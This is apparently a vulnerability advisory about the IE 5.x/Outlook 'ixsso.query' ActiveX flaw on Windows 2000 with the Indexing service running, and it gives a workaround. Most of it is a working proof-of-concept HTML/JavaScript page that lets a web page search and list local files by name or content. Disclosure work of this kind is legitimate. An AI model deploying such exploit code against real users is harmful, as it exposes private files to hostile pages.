|
|
|
|
| |
| There is a security vulnerability in IE 5.x/Outlook/Outlook and Windows 2000 when its Indexing service is started (it does not run by default). The vulnerability allows searching for files with a specific name (wildcards are allowed) or content. Combined with other local file reading vulnerabilities this may be dangerous, especially the feature of searching for files that contain certain content. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
Vulnerable systems:
IE 5.x/Outlook/Outlook Express - Windows 2000 with Indexing service started
The problem is the "ixsso.query" ActiveXObject that is used to query the Indexing service and is surprisingly marked safe for scripting.
Exploit:
--------indexserv1.html-------------------------------------------
<INPUT TYPE="BUTTON" VALUE="Search"
onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename =
*.txt')">
<BR>
<SCRIPT>
function g(q1)
{
qu=new ActiveXObject("ixsso.query");
qu.Catalog="System";
//qu.query="@contents name";
//qu.query="#filename .htm or name near test";
//qu.query='@filename = *.doc ';
qu.query=q1;
qu.Columns="filename, path, doctitle, doccomments, docauthor, size";
rs=qu.CreateRecordset("nonsequential");
//alert("Records: "+rs.RecordCount);
doc=window.frames[0].document;
doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"<BR>");
doc.writeln("<TABLE BORDER=2>");
doc.writeln("<TR><TD>Path</TD><TD>size</TD><TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
while (!rs.EOF)
{
doc.writeln("<TR><TD><A TARGET='_blank'
HREF='file://"+rs("Path")+"'</A>"+rs("Path")+"</TD><TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD><TD>"+rs("DocTitle")+"</TD></TR>");
rs.MoveNext();
}
doc.writeln("</TABLE>");
}
//setTimeout("g()",1000);
</SCRIPT>
<IFRAME WIDTH=700 HEIGHT=400 SRC="about:blank"></IFRAME>
Workaround:
Disable Active Scripting or Indexing service.
Demonstration
A live demonstration is available at:
http://www.guninski.com/indexserv1.html
|
|
|
|
|
|
|
